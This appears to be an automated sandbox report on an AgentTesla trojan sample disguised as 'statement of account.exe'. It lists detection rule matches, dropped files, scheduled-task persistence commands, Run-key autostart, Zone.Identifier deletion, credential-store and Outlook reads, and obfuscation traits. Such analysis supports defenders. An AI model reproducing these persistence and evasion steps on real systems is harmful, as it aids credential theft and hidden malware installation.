                Source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAC0D4
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAE5A0
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAE598
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_07279AD8
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_07279AC8
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_0728D3F0
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_07284B10
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_07281A18
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_0728D630
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_02DFF3B8
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_02DFF700
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_02DFB078
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_02DF6482
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_067E8598
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_067EE218
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AEDEC8
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AED7B8
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AEACF8
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AEDE64
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AECC18
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE3330
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B38635
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B33618
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B33A58
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B35980
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B37568
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B3C158
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B3C89A
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B3C998
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06B3E760
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename159a3513-189a-4a39-a83d-9c07ca495265.exe4 vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename159a3513-189a-4a39-a83d-9c07ca495265.exe4 vs statement of account.exe
                Source: statement of account.exe, 00000000.00000000.242663190.00000000007C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename1xOMKkLm.exeH vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.301316535.00000000073F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.281387531.0000000001008000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs statement of account.exe
                Source: statement of account.exe, 00000000.00000002.292671867.0000000003F4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1xOMKkLm.exeH vs statement of account.exe
                Source: statement of account.exe, 00000003.00000000.271720897.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename159a3513-189a-4a39-a83d-9c07ca495265.exe4 vs statement of account.exe
                Source: statement of account.exe, 00000003.00000002.507525253.00000000010F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs statement of account.exe
                Source: statement of account.exe, 00000003.00000003.323559038.00000000065AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1xOMKkLm.exeH vs statement of account.exe
                Source: statement of account.exeBinary or memory string: OriginalFilename1xOMKkLm.exeH vs statement of account.exe
                Source: statement of account.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: LtdekfbHULJt.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: LIhMQ.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: statement of account.exeReversingLabs: Detection: 69%
                Source: statement of account.exeVirustotal: Detection: 36%
                Source: C:\Users\user\Desktop\statement of account.exeFile read: C:\Users\user\Desktop\statement of account.exeJump to behavior
                Source: statement of account.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\statement of account.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\statement of account.exe C:\Users\user\Desktop\statement of account.exe
                Source: C:\Users\user\Desktop\statement of account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\statement of account.exeProcess created: C:\Users\user\Desktop\statement of account.exe {path}
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe"
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe {path}
                Source: C:\Users\user\Desktop\statement of account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: C:\Users\user\Desktop\statement of account.exeProcess created: C:\Users\user\Desktop\statement of account.exe {path}
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\Desktop\statement of account.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\statement of account.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\statement of account.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\statement of account.exeFile created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeJump to behavior
                Source: C:\Users\user\Desktop\statement of account.exeFile created: C:\Users\user\AppData\Local\Temp\tmp86BD.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@21/10@3/2
                Source: C:\Users\user\Desktop\statement of account.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: statement of account.exe, 00000003.00000002.538222623.000000000331D000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.536585995.0000000003397000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.538095937.0000000002CE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: statement of account.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\statement of account.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\statement of account.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeMutant created: \Sessions\1\BaseNamedObjects\lwJpmEYBVlDhLVqonoBA
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
                Source: 3.0.statement of account.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.statement of account.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\statement of account.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\statement of account.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\statement of account.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\statement of account.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: statement of account.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: statement of account.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: statement of account.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: 1xOMKkLm.pdb source: statement of account.exe, LtdekfbHULJt.exe.0.dr, LIhMQ.exe.3.dr
                Source: Binary string: 1xOMKkLm.pdbSHA256 source: statement of account.exe, LtdekfbHULJt.exe.0.dr, LIhMQ.exe.3.dr

                Data Obfuscation

                barindex
                Source: statement of account.exe, Form1.cs.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: LtdekfbHULJt.exe.0.dr, Form1.cs.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.0.statement of account.exe.7c0000.0.unpack, Form1.cs.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: LIhMQ.exe.3.dr, Form1.cs.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: statement of account.exe, Form1.cs.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: LtdekfbHULJt.exe.0.dr, Form1.cs.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: 0.0.statement of account.exe.7c0000.0.unpack, Form1.cs.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: LIhMQ.exe.3.dr, Form1.cs.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAE210 push edx; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAE469 push edx; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAE591 push ebx; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAE549 push ebx; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EA8B69 push ss; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EA8B78 push ss; retn C802h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAEED8 push esi; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EAEEA7 push esi; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EA94E0 push ds; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EA9768 push ds; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EA7B80 push cs; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_00EA7B71 push cs; retn 0002h
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 0_2_07289322 pushad ; retf
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_067EA168 pushfd ; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17AA push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17A1 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17B9 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17B2 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE178E push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE1782 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE179A push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE1792 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17EA push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17E2 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17CA push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17C2 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17DA push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE17D1 push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE177A push es; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE2520 push edi; ret
                Source: C:\Users\user\Desktop\statement of account.exeCode function: 3_2_06AE3330 push es; iretd
                Source: initial sampleStatic PE information: section name: .text entropy: 7.547588668070066
                Source: initial sampleStatic PE information: section name: .text entropy: 7.547588668070066
                Source: initial sampleStatic PE information: section name: .text entropy: 7.547588668070066
                Source: C:\Users\user\Desktop\statement of account.exeFile created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeJump to dropped file
                Source: C:\Users\user\Desktop\statement of account.exeFile created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\statement of account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: C:\Users\user\Desktop\statement of account.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LIhMQJump to behavior
                Source: C:\Users\user\Desktop\statement of account.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LIhMQJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\Desktop\statement of account.exeFile opened: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeFile opened: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\statement of account.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
